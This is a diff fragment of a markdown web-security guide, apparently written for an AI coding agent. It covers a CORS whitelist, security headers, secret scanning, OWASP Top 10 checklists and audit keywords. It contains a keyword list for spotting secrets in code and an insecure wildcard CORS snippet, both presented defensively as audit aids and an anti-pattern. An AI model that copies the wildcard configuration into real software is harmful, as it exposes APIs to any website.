+ // X-Content-Type-Options → Prevents MIME sniffing (nosniff)
189
+ // X-Frame-Options → Prevents clickjacking (DENY)
190
+ // Strict-Transport-Security Forces HTTPS (HSTS)
191
+ // X-XSS-Protection Legacy XSS filter (deprecated, CSP is better)
192
+ // Referrer-Policy Controls referrer header
193
+
194
+ // CORS never wildcard in production
195
+ app.use(cors({
196
+ origin: ["https://myapp.com", "https://admin.myapp.com"],
197
+ methods: ["GET", "POST", "PUT", "DELETE"],
198
+ credentials: true,
199
+ }));
200
+
201
+ // ❌ HALLUCINATION TRAP: origin: "*" disables CORS protection entirely
202
+ // ❌ cors({ origin: "*" }) ← allows any website to call your API
203
+ // ✅ cors({ origin: ["https://myapp.com"] }) ← whitelist specific domains
204
+ ```
205
+
206
+ ---
207
+
208
+ ## Secret Scanning
209
+
210
+ ```
211
+ Secrets that MUST be in environment variables:
212
+ - Database connection strings
213
+ - API keys (Stripe, SendGrid, etc.)
214
+ - JWT signing secrets
215
+ - OAuth client secrets
216
+ - Encryption keys
217
+
218
+ Detection tools:
219
+ - git-secrets (pre-commit hook)
220
+ - TruffleHog / detect-secrets (scan history)
221
+ - GitHub secret scanning (automatic)
222
+ - GitGuardian (enterprise)
223
+
224
+ If a secret is committed:
225
+ 1. IMMEDIATELY rotate the secret (new key/password)
226
+ 2. Remove from git history (BFG Repo-Cleaner or git-filter-repo)
227
+ 3. Force-push cleaned history
228
+ 4. Audit access logs for the compromised secret
229
+ 5. Post-incident review
230
+ ```
231
+
232
+ ---
233
+
234
+ ---
235
+
236
+ ## Security Checklists
237
+
238
+ ---
239
+
240
+ ### OWASP Top 10 Audit Checklist
241
+
242
+ #### A01: Broken Access Control
243
+ - [ ] Authorization on all protected routes
244
+ - [ ] Deny by default
245
+ - [ ] Rate limiting implemented
246
+ - [ ] CORS properly configured
247
+
248
+ #### A02: Cryptographic Failures
249
+ - [ ] Passwords hashed (bcrypt/argon2, cost 12+)
250
+ - [ ] Sensitive data encrypted at rest
251
+ - [ ] TLS 1.2+ for all connections
252
+ - [ ] No secrets in code/logs
253
+
254
+ #### A03: Injection
255
+ - [ ] Parameterized queries
256
+ - [ ] Input validation on all user data
257
+ - [ ] Output encoding for XSS
258
+ - [ ] No eval() or dynamic code execution
259
+
260
+ #### A04: Insecure Design
261
+ - [ ] Threat modeling done
262
+ - [ ] Security requirements defined
263
+ - [ ] Business logic validated
264
+
265
+ #### A05: Security Misconfiguration
266
+ - [ ] Unnecessary features disabled
267
+ - [ ] Error messages sanitized
268
+ - [ ] Security headers configured
269
+ - [ ] Default credentials changed
270
+
271
+ #### A06: Vulnerable Components
272
+ - [ ] Dependencies up to date
273
+ - [ ] No known vulnerabilities
274
+ - [ ] Unused dependencies removed
275
+
276
+ #### A07: Authentication Failures
277
+ - [ ] MFA available
278
+ - [ ] Session invalidation on logout
279
+ - [ ] Session timeout implemented
280
+ - [ ] Brute force protection
281
+
282
+ #### A08: Integrity Failures
283
+ - [ ] Dependency integrity verified
284
+ - [ ] CI/CD pipeline secured
285
+ - [ ] Update mechanism secured
286
+
287
+ #### A09: Logging Failures
288
+ - [ ] Security events logged
289
+ - [ ] Logs protected
290
+ - [ ] No sensitive data in logs
291
+ - [ ] Alerting configured
292
+
293
+ #### A10: SSRF
294
+ - [ ] URL validation implemented
295
+ - [ ] Allow-list for external calls
296
+ - [ ] Network segmentation
297
+
298
+ ---
299
+
300
+ ### Authentication Checklist
301
+
302
+ - [ ] Strong password policy
303
+ - [ ] Account lockout
304
+ - [ ] Secure password reset
305
+ - [ ] Session management
306
+ - [ ] Token expiration
307
+ - [ ] Logout invalidation
308
+
309
+ ---
310
+
311
+ ### API Security Checklist
312
+
313
+ - [ ] Authentication required
314
+ - [ ] Authorization per endpoint
315
+ - [ ] Input validation
316
+ - [ ] Rate limiting
317
+ - [ ] Output sanitization
318
+ - [ ] Error handling
319
+
320
+ ---
321
+
322
+ ### Data Protection Checklist
323
+
324
+ - [ ] Encryption at rest
325
+ - [ ] Encryption in transit
326
+ - [ ] Key management
327
+ - [ ] Data minimization
328
+ - [ ] Secure deletion
329
+
330
+ ---
331
+
332
+ ### Security Headers
333
+
334
+ |Header|Purpose|
335
+ |--------|---------|
336
+ |**Content-Security-Policy**|XSS prevention|
337
+ |**X-Content-Type-Options**|MIME sniffing|
338
+ |**X-Frame-Options**|Clickjacking|
339
+ |**Strict-Transport-Security**|Force HTTPS|
340
+ |**Referrer-Policy**|Referrer control|
341
+
342
+ ---
343
+
344
+ ### Quick Audit Commands
345
+
346
+ |Check|What to Look For|
347
+ |-------|------------------|
348
+ |Secrets in code|password, api_key, secret|
349
+ |Dangerous patterns|eval, innerHTML, SQL concat|
350
+ |Dependency issues|npm audit, snyk|
351
+
352
+ ---
353
+
354
+ **Usage:** Copy relevant checklists into your PLAN.md or security report.